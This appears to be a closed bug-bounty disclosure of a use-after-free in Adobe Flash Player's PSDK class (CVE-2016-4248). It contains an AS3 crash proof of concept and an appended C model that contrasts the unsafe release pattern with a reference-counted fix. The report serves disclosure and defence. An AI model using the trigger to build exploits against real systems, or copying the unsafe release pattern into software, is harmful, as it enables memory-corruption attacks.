Adobe Flash Player PSDK Class Use After Free Vulnerability

Disclosed: 2019-11-12 09:41:54 By hhj4ck To ibb
Unknown
Vulnerability Details
I. Summary

Adobe Flash Player is prone to a vulnerability which leads to a Use After Free. Since the release condition is highly controllable, it is feasible to build a fully working exploit for shellcode execution with a suitable AS3 object occupying the original PSDK memory.

------------------------------------------------------------------

II. Description

The PSDK class exposes a member function "release()", which can be called directly to release the inner memory of PSDK.pSDK. However, not all of PSDK's AS3 references are cleaned up, so it is still possible to invoke virtual functions on a released memory block.

Source code of crash.swf:

    package {
        import com.adobe.tvsdk.mediacore.PSDK;
        import flash.display.Sprite;

        public class poc extends Sprite {
            public function poc() {
                // Two AS3 references to the same native PSDK object
                var ps:PSDK = PSDK.pSDK;
                var ps_:PSDK = PSDK.pSDK;
                // Free the native object through the first reference
                ps.release();
                // Virtual call through the second, still-live reference
                ps_.currentTime;
            }
        }
    }

------------------------------------------------------------------

III. Impact

Use After Free

------------------------------------------------------------------

IV. Affected

Adobe Flash Player 22.0.0.192

------------------------------------------------------------------

V. Credit

Wen Guanxing from Pangu LAB is credited for this vulnerability. It has been assigned CVE-2016-4248 by Adobe: https://helpx.adobe.com/security/products/flash-player/apsb16-25.html
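The defect pattern described above, a script-visible release() that frees a native object while other script references still point at it, is modelled here in C as an added example. This is not Adobe's code and nothing in it is taken from the Flash Player runtime; the Psdk struct, the Wrapper type and all function names are hypothetical. It replays the PoC sequence (two references, release through one, call through the other) under the unsafe policy, where both references end up dangling, and under a reference-counted policy, where the object lives until the last reference gives up its share and a released reference is rejected instead of dereferenced.

```c
#include <stdlib.h>
#include <stdio.h>

/* Constructed model, not Adobe's code: a native object with a vtable-like
 * function pointer, shared by several script-side references. */
typedef struct Psdk Psdk;
struct Psdk {
    double (*get_current_time)(const Psdk *self);
    double current_time;
    long refcount;          /* number of wrappers that still own a share */
};

typedef struct { Psdk *obj; } Wrapper;   /* what an AS3 variable would hold */

static long live_objects = 0;            /* allocation counter for the test */

static double psdk_current_time(const Psdk *self) { return self->current_time; }

static Psdk *psdk_new(double t) {
    Psdk *p = calloc(1, sizeof *p);
    if (!p) abort();
    p->get_current_time = psdk_current_time;
    p->current_time = t;                 /* constructed sample value */
    live_objects++;
    return p;
}

/* Another script variable pointing at the same native object. */
static Wrapper wrapper_acquire(Psdk *p) { p->refcount++; return (Wrapper){ p }; }

/* Vulnerable pattern: release() frees the native object immediately, ignoring
 * the other wrappers, and does not even clear this wrapper's own pointer. */
void release_unsafe(Wrapper *w) {
    free(w->obj);
    live_objects--;
    /* w->obj and every other wrapper's obj now dangle. */
}

/* Hardened pattern: the wrapper gives up its share; the object is freed only
 * when the last share is gone, and the wrapper's pointer is cleared so a
 * later call through it is rejected instead of touching freed memory. */
void release_safe(Wrapper *w) {
    Psdk *p = w->obj;
    if (!p) return;                      /* double release is a no-op */
    w->obj = NULL;
    if (--p->refcount == 0) { free(p); live_objects--; }
}

/* Virtual call through a wrapper; returns 0 on success, -1 if released. */
int wrapper_current_time(const Wrapper *w, double *out) {
    if (!w->obj) return -1;
    *out = w->obj->get_current_time(w->obj);
    return 0;
}

/* Replays the PoC sequence under one policy. Returns how many wrappers still
 * hold a pointer after the first release: 2 under the unsafe release (both
 * dangle), 1 under the safe release; -1 if the safe policy misbehaves. */
int dangling_after_release(int use_safe) {
    Psdk *p = psdk_new(1.5);
    Wrapper ps = wrapper_acquire(p);     /* var ps:PSDK  = PSDK.pSDK; */
    Wrapper ps_ = wrapper_acquire(p);    /* var ps_:PSDK = PSDK.pSDK; */
    int count;
    double t;
    if (use_safe) {
        release_safe(&ps);               /* ps.release(); */
        count = (ps.obj != NULL) + (ps_.obj != NULL);
        /* ps_.currentTime: still backed by a live object */
        if (wrapper_current_time(&ps_, &t) != 0 || t != 1.5) return -1;
        /* call through the released wrapper is refused, not executed */
        if (wrapper_current_time(&ps, &t) != -1) return -1;
        release_safe(&ps_);              /* last share: object freed here */
    } else {
        release_unsafe(&ps);             /* ps.release(); */
        /* pointer values are only compared, never dereferenced */
        count = (ps.obj != NULL) + (ps_.obj != NULL);
        ps.obj = ps_.obj = NULL;         /* drop the dangling pointers */
    }
    return count;
}

long live_object_count(void) { return live_objects; }

int main(void) {
    printf("unsafe release: %d dangling wrappers\n", dangling_after_release(0));
    printf("safe release:   %d dangling wrappers\n", dangling_after_release(1));
    printf("live objects:   %ld\n", live_object_count());
    return 0;
}
```

The check to take from this is the one in wrapper_current_time: a script-level reference must never be able to reach a native vtable after its share has been released, which means the release path has to clear the reference it was called on and must not free the object while other references are outstanding.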
Report Stats
  • Report ID: 151043
  • State: Closed
  • Substate: resolved
  • Upvotes: 4